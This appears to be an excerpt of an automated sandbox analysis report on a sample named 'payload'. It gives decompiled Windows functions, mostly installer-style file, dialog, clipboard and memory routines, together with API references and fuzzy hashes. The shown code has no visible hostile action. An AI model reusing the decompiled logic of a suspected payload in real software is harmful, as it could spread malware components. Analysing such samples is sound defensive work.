Instruction ID: 6913ff832cf321f63cdd7bb00c8cc70b6829a5dd8220bacc95ff598af340a114
Opcode Fuzzy Hash: 11541d565f05363a0d465782138c1ad9d83dbb2602eb40d854f4a90bf0086a6c
Instruction Fuzzy Hash: 7FE04FB6240108AFDB00DFA4DD46F9577FCE718701F008021B608D7091C674E5508B69

Uniqueness

Uniqueness Score: -1.00%

Function 00405A13 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405A13(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405a17
0x00405a27
0x00405a2f
0x00000000
0x00405a36
0x00000000
0x00405a38

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 00405A27

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction ID: edb1125888c6416cb1e0b95ca9609c2ac4c4c792cbd4e8f88826aa2405e91300
Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
Instruction Fuzzy Hash: D7E0EC3261425EEFDF109E659C40AEB7B6DEB053A4F048532FD25E2150E271E8219FB5

Uniqueness

Uniqueness Score: -1.00%

Function 004059E4 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004059E4(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004059e8
0x004059f8
0x00405a00
0x00000000
0x00405a07
0x00000000
0x00405a09

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 004059F8

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
Instruction ID: 6c2e581bc83b2d89c4a498056592e8f52b2bea012b9e1656670f40d352b29975
Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
Instruction Fuzzy Hash: 4DE0EC3272429AABDF109E559C44EEF7BACEB05360F048932FD15E3190D235ED219FA9

Uniqueness

Uniqueness Score: -1.00%

Function 1000270B Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000404c, 4, 0x40, 0x1000403c); // executed
					 *0x1000404c = 0xc2;
					 *0x1000403c = 0;
					 *0x10004044 = 0;
					 *0x10004058 = 0;
					 *0x10004048 = 0;
					 *0x10004040 = 0;
					 *0x10004050 = 0;
					 *0x1000404e = 0;
				}
				return 1;
			}

0x10002714
0x10002719
0x10002729
0x10002731
0x10002738
0x1000273d
0x10002742
0x10002747
0x1000274c
0x10002751
0x10002756
0x10002756
0x1000275e

APIs

VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729

Memory Dump Source

Source File: 00000001.00000002.1417066379.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.1417055818.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1417073030.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1417078966.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_payload.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
Instruction ID: 4f82052a8ee677216feeb46ba648c84afb962adc58c95b92ee0d34447feb5494
Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
Instruction Fuzzy Hash: B5F09BF19092A0DEF360DF688CC4B063FE4E3983D5B03892AE358F6269EB7441448B19

Uniqueness

Uniqueness Score: -1.00%

Function 004022C7 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004022C7(char __ebx) {
				char _t7;
				CHAR* _t8;
				CHAR* _t19;
				void* _t21;
				void* _t24;

				_t7 =  *0x409010; // 0xa
				 *(_t21 + 0xa) = _t7;
				_t8 = E00402A3A(1);
				 *(_t21 - 0x34) = E00402A3A(0x12);
				GetPrivateProfileStringA(_t8,  *(_t21 - 0x34), _t21 + 0xa, _t19, 0x3ff, E00402A3A(0xffffffdd)); // executed
				_t24 =  *_t19 - 0xa;
				if(_t24 == 0) {
					 *((intOrPtr*)(_t21 - 4)) = 1;
					 *_t19 = __ebx;
				}
				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x004022c7
0x004022cf
0x004022d3
0x004022e3
0x004022fa
0x00402300
0x00401733
0x0040267a
0x00402681
0x00402681
0x004028d2
0x004028de

APIs

GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022FA

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: e1bf17ceeca7babf037772fd815ac17da169c1b5a8a1c598223fa677f22f5cbc
Instruction ID: 39f1f9859769fa242ff58571ca275c021542d1dfaf63d46caa25723865460d27
Opcode Fuzzy Hash: e1bf17ceeca7babf037772fd815ac17da169c1b5a8a1c598223fa677f22f5cbc
Instruction Fuzzy Hash: 66E08630A04214BFDB20EFA08D09BAE3669BF11714F10403AF9917B0D2EAB849419B1D

Uniqueness

Uniqueness Score: -1.00%

Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401595() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesA(E00402A3A(0xfffffff0),  *(_t11 - 0x24)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015a0
0x004015a6
0x004015a8
0x004026a6
0x004026a6
0x004028d2
0x004028de

APIs

SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 4260423a6babc0d982a83c1f89c59980bcd1968f2ee2cb317ff03f39022b103f
Instruction ID: e7eaa26ee73965d29c722757b3dcf4c0106c30ff4276e434a6a3861fc4943bf0
Opcode Fuzzy Hash: 4260423a6babc0d982a83c1f89c59980bcd1968f2ee2cb317ff03f39022b103f
Instruction Fuzzy Hash: 65D01273B14100ABDB10EBA49A08A9D73A5AB60329B308637D201F21D1D6B9CA55AA29

Uniqueness

Uniqueness Score: -1.00%

Function 00403F13 Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F13(int _a4) {
				long _t2;

				_t2 = SendMessageA( *0x423708, 0x28, _a4, 1); // executed
				return _t2;
			}

0x00403f21
0x00403f27

APIs

SendMessageA.USER32 ref: 00403F21

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19

Uniqueness

Uniqueness Score: -1.00%

Function 00403091 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403091(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409018, _a4, 0, 0); // executed
				return _t2;
			}

0x0040309f
0x004030a5

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 0040309F

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D

Uniqueness

Uniqueness Score: -1.00%

Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 17
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014D6() {
				long _t2;
				void* _t6;
				void* _t10;

				_t2 = E00402A1D(_t6);
				if(_t2 <= 1) {
					_t2 = 1;
				}
				Sleep(_t2); // executed
				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t10 - 4));
				return 0;
			}

0x004014d7
0x004014df
0x004014e3
0x004014e3
0x004014e5
0x004028d2
0x004028de

APIs

Sleep.KERNELBASE(00000000), ref: 004014E5

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: fc596c614bf1f88db1f948d4491d55e59510561650873cba60640436c697c481
Instruction ID: 9c89d06b59eba3ca4e7b2e7dbe410ddf5a45079d0a4e8d0192c1fc54d184d5ff
Opcode Fuzzy Hash: fc596c614bf1f88db1f948d4491d55e59510561650873cba60640436c697c481
Instruction Fuzzy Hash: A2D0C777B1454057D710E7B87E8545A63A9F7513253204937D502F1091D578C9059A29

Uniqueness

Uniqueness Score: -1.00%

Function 10001215 Relevance: 1.3, APIs: 1, Instructions: 4
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001215() {
				void* _t1;

				_t1 = GlobalAlloc(0x40,  *0x1000405c); // executed
				return _t1;
			}

0x1000121d
0x10001223

APIs

GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D

Memory Dump Source

Source File: 00000001.00000002.1417066379.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.1417055818.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1417073030.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1417078966.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_payload.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
Instruction ID: 35b308b173d9b0532f6cde55f5bface33093279d7ce3c78a2cc6db588f634b90
Opcode Fuzzy Hash: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
Instruction Fuzzy Hash: 6CA002B1945620DBFE429BE08D9EF1B3B25E748781F01C040E315641BCCA754010DF39

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00405050 Relevance: 54.3, APIs: 36, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00405050(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x422ee4; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404FE4, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E00405D1B(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x41fd08;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x422ecc - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x423708, 8);
							__eflags =  *0x42378c - _t150;
							if( *0x42378c == _t150) {
								E00404F12( *((intOrPtr*)( *0x41f4e0 + 0x34)), _t150);
							}
							E00403EB7(1);
							goto L25;
						}
						 *0x41f0d8 = 2;
						E00403EB7(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403F45(_t157, _a12, _a16);
						}
						ShowWindow( *0x422ed0, _t150);
						ShowWindow(_v8, 8);
						E00403F13(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x423710;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x422ed0 = GetDlgItem(_a4, 0x403);
				 *0x422ec8 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x422ee4 = _t128;
				_v8 = _t128;
				E00403F13( *0x422ed0);
				 *0x422ed4 = E004047B0(4);
				 *0x422eec = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403EDE(_a4);
				if(( *0x423718 & 0x00000003) != 0) {
					ShowWindow( *0x422ed0, _t150);
					if(( *0x423718 & 0x00000002) != 0) {
						 *0x422ed0 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403F13( *0x422ec8);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x423718 & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}

0x00405056
0x0040505e
0x00405061
0x00405069
0x0040506c
0x004051fb
0x00405201
0x00405225
0x00405225
0x00405231
0x00405237
0x00405259
0x00405259
0x0040525f
0x004052b4
0x004052b4
0x004052b7
0x00000000
0x00000000
0x004052b9
0x004052bc
0x004052bf
0x00000000
0x00000000
0x004052c9
0x004052cf
0x004052d1
0x004052d4
0x004053d1
0x00000000
0x004053d1
0x004052e3
0x004052ef
0x004052f8
0x004052ff
0x00405303
0x00405306
0x0040530f
0x00405315
0x00405318
0x00405318
0x00405328
0x0040532e
0x00405331
0x0040533c
0x0040533c
0x0040533d
0x00405340
0x00405347
0x0040534e
0x00405356
0x00405356
0x00405364
0x0040536a
0x0040536d
0x0040536d
0x00405374
0x0040537a
0x00405383
0x0040538a
0x00405393
0x00405395
0x00405398
0x004053a7
0x004053a9
0x004053ac
0x004053ad
0x004053b0
0x004053b1
0x004053b2
0x004053b2
0x004053ba
0x004053c5
0x004053cb
0x004053cb
0x00000000
0x00405331
0x00405261
0x00405267
0x00405295
0x00405297
0x0040529d
0x004052a8
0x004052a8
0x004052af
0x00000000
0x004052af
0x0040526b
0x00405275
0x00000000
0x00405239
0x00405239
0x0040523f
0x0040527a
0x00000000
0x00405281
0x00405248
0x0040524f
0x00405254
0x00000000
0x00405254
0x00405237
0x00405072
0x00405076
0x0040507e
0x00405082
0x00405085
0x00405088
0x0040508b
0x0040508e
0x0040508f
0x00405090
0x004050a9
0x004050ac
0x004050b6
0x004050c5
0x004050cd
0x004050d5
0x004050da
0x004050dd
0x004050e9
0x004050f2
0x004050fb
0x0040511d
0x00405123
0x00405134
0x00405139
0x00405147
0x00405155
0x00405155
0x0040515a
0x00405168
0x00405168
0x0040516d
0x00405170
0x00405175
0x00405181
0x0040518a
0x00405197
0x004051a6
0x00405199
0x0040519e
0x0040519e
0x004051b2
0x004051b2
0x004051c6
0x004051cf
0x004051d8
0x004051e8
0x004051f4
0x004051f4
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 004050AF
GetDlgItem.USER32(?,000003EE), ref: 004050BE
GetClientRect.USER32 ref: 004050FB
GetSystemMetrics.USER32 ref: 00405102
SendMessageA.USER32 ref: 00405123
SendMessageA.USER32 ref: 00405134
SendMessageA.USER32 ref: 00405147
SendMessageA.USER32 ref: 00405155
SendMessageA.USER32 ref: 00405168
ShowWindow.USER32(00000000,?), ref: 0040518A
ShowWindow.USER32(?,00000008), ref: 0040519E
GetDlgItem.USER32(?,000003EC), ref: 004051BF
SendMessageA.USER32 ref: 004051CF
SendMessageA.USER32 ref: 004051E8
SendMessageA.USER32 ref: 004051F4
GetDlgItem.USER32(?,000003F8), ref: 004050CD

Part of subcall function 00403F13: SendMessageA.USER32 ref: 00403F21

GetDlgItem.USER32(?,000003EC), ref: 00405210
CreateThread.KERNEL32(00000000,00000000,Function_00004FE4,00000000), ref: 0040521E
CloseHandle.KERNEL32(00000000), ref: 00405225
ShowWindow.USER32(00000000), ref: 00405248
ShowWindow.USER32(?,00000008), ref: 0040524F
ShowWindow.USER32(00000008), ref: 00405295
SendMessageA.USER32 ref: 004052C9
CreatePopupMenu.USER32 ref: 004052DA
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004052EF
GetWindowRect.USER32(?,000000FF), ref: 0040530F
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405328
SendMessageA.USER32 ref: 00405364
OpenClipboard.USER32(00000000), ref: 00405374
EmptyClipboard.USER32 ref: 0040537A
GlobalAlloc.KERNEL32(00000042,?), ref: 00405383
GlobalLock.KERNEL32 ref: 0040538D
SendMessageA.USER32 ref: 004053A1
GlobalUnlock.KERNEL32(00000000), ref: 004053BA
SetClipboardData.USER32 ref: 004053C5
CloseClipboard.USER32 ref: 004053CB

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
